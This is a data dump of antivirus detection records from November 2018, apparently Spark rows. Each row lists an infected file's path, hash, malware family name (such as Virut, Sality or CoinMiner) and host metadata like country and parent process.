  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T09:36:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T10:52:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-095659-0907d26f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e356039\\AVSCAN-20181104-095639-074A7496\\AVSCAN-20181104-095659-0907D26F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T14:40:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T08:56:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154156-2610d418', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154139-23CF8B35\\AVSCAN-20181104-154156-2610D418', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154104-1f39e261', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154039-1BDAEC7E\\AVSCAN-20181104-154104-1F39E261', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dforrt.dll', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\dforrt.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='3733fc7edd059f37cf9b5173a6c6f1045fb96003a1fc43d6ec004a84970a17bf', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:12:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fsquirt.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_bth.inf_31bf3856ad364e35_6.1.7600.16385_none_721b1a5f1ce4cd06\\fsquirt.exe', filesize=256000, name='W32/Jeefo.A.#M1.#R1'), hash='37475fdb0adc2ca0d5a7c66987acc9db9a8a90f0c1f30ea6b031849e3daeec45', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:59:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=257024, timestamp='2018-11-04T12:51:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202533-4b38f7d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a786c66\\AVSCAN-20181104-202015-215E41B1\\AVSCAN-20181104-202533-4B38F7D8', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:25:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140454-8d2acdcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72da8269\\AVSCAN-20181104-140306-831E4B42\\AVSCAN-20181104-140454-8D2ACDCD', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:04:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111712-e23c222e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd7627ed\\AVSCAN-20181104-111616-DA8261DA\\AVSCAN-20181104-111712-E23C222E', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:17:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082244-49cdb9ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6d46ad8\\AVSCAN-20181104-082225-4720EC21\\AVSCAN-20181104-082244-49CDB9BA', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094820-86546987', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e94398e3\\AVSCAN-20181104-094646-7AE93737\\AVSCAN-20181104-094820-86546987', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:48:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094854-8a778315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e94398e3\\AVSCAN-20181104-094646-7AE93737\\AVSCAN-20181104-094854-8A778315', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T00:49:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Music\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T11:55:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Music\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T11:55:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090704-0a8cc861', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db8dd2eb\\AVSCAN-20181104-090024-C0286FC2\\AVSCAN-20181104-090704-0A8CC861', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:07:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090745-122d4a25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db8dd2eb\\AVSCAN-20181104-090024-C0286FC2\\AVSCAN-20181104-090745-122D4A25', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:07:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T10:15:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dfceaceacebdeacebcfbdfbeaceadfbdd.dfceaceacebdeacebcfbdfbeaceadfbdd', filepath='i:\\\xa0\\dfceaceacebdeacebcfbdfbeaceadfbdd.dfceaceacebdeacebcfbdfbeaceadfbdd', filesize=7232000, name='TR/Crypt.ZPACK.Gen7.#M300.#R603873'), hash='3a1b1fbf1704484e51383dcd78466bbc448c23f32297a5b10cc4723ad012edd6', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:41:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='worm.exe', filepath='\\?\\J:\\الارنب الجرء\\ارنوب\\WORM.EXE', filesize=1152000, name='W32/Virut.Gen.#M1.#R1'), hash='3a7aca692f42fd2f23386918579a007b22dde97c01afaa6fc02dc0d5d4268075', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:28:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setupdatamngr_ilivid.exe', filepath='\\\\?\\C:\\Windows\\Temp\\c2185fa0\\SetupDataMngr_iLivid.exe', filesize=8680000, name='PUA/iLivid.iona.#M1.#R1'), hash='3ad255e09ca657043a4d99ae2e7d869dd8fa42e691f44d22b1c11364730eaa40', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:28:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ds.exe', filepath='D:\\العاب حديثة\\حرب الفضاء\\DemonStarSM1_Shareware\\ds.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='3b03d62ccf2a2b8be6357b9309b4f185db9d737882970f9516c0edb87855e2d6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rdbgsetup.exe', filepath='C:\\Program Files\\Microsoft SQL Server\\100\\Shared\\VS2008\\1031\\rdbgsetup.exe', filesize=7680000, name='W32/Sality.AT.#M1.#R1'), hash='3b0738f5703a3133ababf82217ffc8ea6d381e7422ae4f25471f9db039ea11d9', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:25:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='有情登入器.exe', filepath='D:\\BaiduYunDownload\\有情天堂懶人包270\\天堂(Lineage 3.63C)\\有情登入器.exe', filesize=6144000, name='HEUR/AGEN.1012077.#M1.#R1'), hash='3be0213a644cf9e36e7ecc445f7337dd6e36aa2d21beda408100a92bb2d0980e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\BaiduYunDownload\\\\\\\\有情天堂懶人包270.rar\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1472976, timestamp='2018-11-04T08:20:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b837bc21bde5f390a4a52063fb17f58f90525b4b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b837bc21bde5f390a4a52063fb17f58f90525b4b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='3c306592257065f205c13ca6ae165701e8ef7d8407b57dac2f573b5f49587563', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:43:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b837bc21bde5f390a4a52063fb17f58f90525b4b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b837bc21bde5f390a4a52063fb17f58f90525b4b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='3c306592257065f205c13ca6ae165701e8ef7d8407b57dac2f573b5f49587563', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:44:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T05:42:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T10:36:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T07:16:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T08:34:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T06:11:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T09:36:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T11:36:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T06:15:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T04:30:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-073035-a44784aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bdc467dd\\AVSCAN-20181104-072210-60C3934D\\AVSCAN-20181104-073035-A44784AA', filesize=1536000, name='TR/Spy.Gen.#M1.#R1'), hash='3cf0cb1f81677f86e375511607ef061fe80b75236cde9e47ace9b27ca655e5a3', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:30:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='assassinscreedrevelations.exe', filepath='D:\\Black_Box\\Assassins Creed - Revelations\\AssassinsCreedRevelations.exe', filesize=768000, name='W32/Jeefo.A.#M1.#R1'), hash='3d49bf6c0f801ab808324bc5511856dd3c1c9c8de34192396465aaa16279500c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:29:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5061947.exe', filepath='C:\\Program Files (x86)\\Super\\5061947.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2066815.exe', filepath='C:\\Program Files (x86)\\Super\\2066815.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2261919.exe', filepath='C:\\Program Files (x86)\\Super\\2261919.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2828168.exe', filepath='C:\\Program Files (x86)\\Super\\2828168.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='689607.exe', filepath='C:\\Program Files (x86)\\Super\\689607.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='3db5aa07261f6da7fd1573deab6b4d6c1fa83df963f36ce98b55183f8dd98860', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T07:46:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000056c5', filepath='C:\\Windows\\Temp\\tmp000002c7\\tmp000056c5', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='3deb85f389a368ff0f924ce8b95028811ab3c9c94c97e06f35290dffb1a7461b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\BDServices\\BitDefenderCOM.exe', parentsize=1028096, timestamp='2018-11-04T00:09:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='freestudio.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\extra\\FreeStudio.exe', filesize=62692000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='3e2d0d88accb84542d6e2fa118e14a29837f00710cf393205b457e2b72333d41', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:25:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='freestudio.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-2560936065-792659283-4188751600-1002\\$RXK0Q8O\\extra\\FreeStudio.exe', filesize=62692000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='3e2d0d88accb84542d6e2fa118e14a29837f00710cf393205b457e2b72333d41', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:41:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180059-ba595090', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae2d1c2\\AVSCAN-20181104-175508-7F3CD3B4\\AVSCAN-20181104-180059-BA595090', filesize=960000, name='ADWARE/iBryte.Gen7.#M1.#R1'), hash='3ea51a0c1d2331e16a49cd84bd57628930b5c0475abdc5fafd20c74b930b07a3', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:31:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\C-GEO\\bin\\transfer.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:43:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='getdatafat.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GETDATAFAT.exe', filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3fafbd95a0d63ca588eb3a76deaa41c632bde63df9db5663a7f66b534e58c369', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:50:59Z'), dt=datetime.date(2018, 11, 4)),
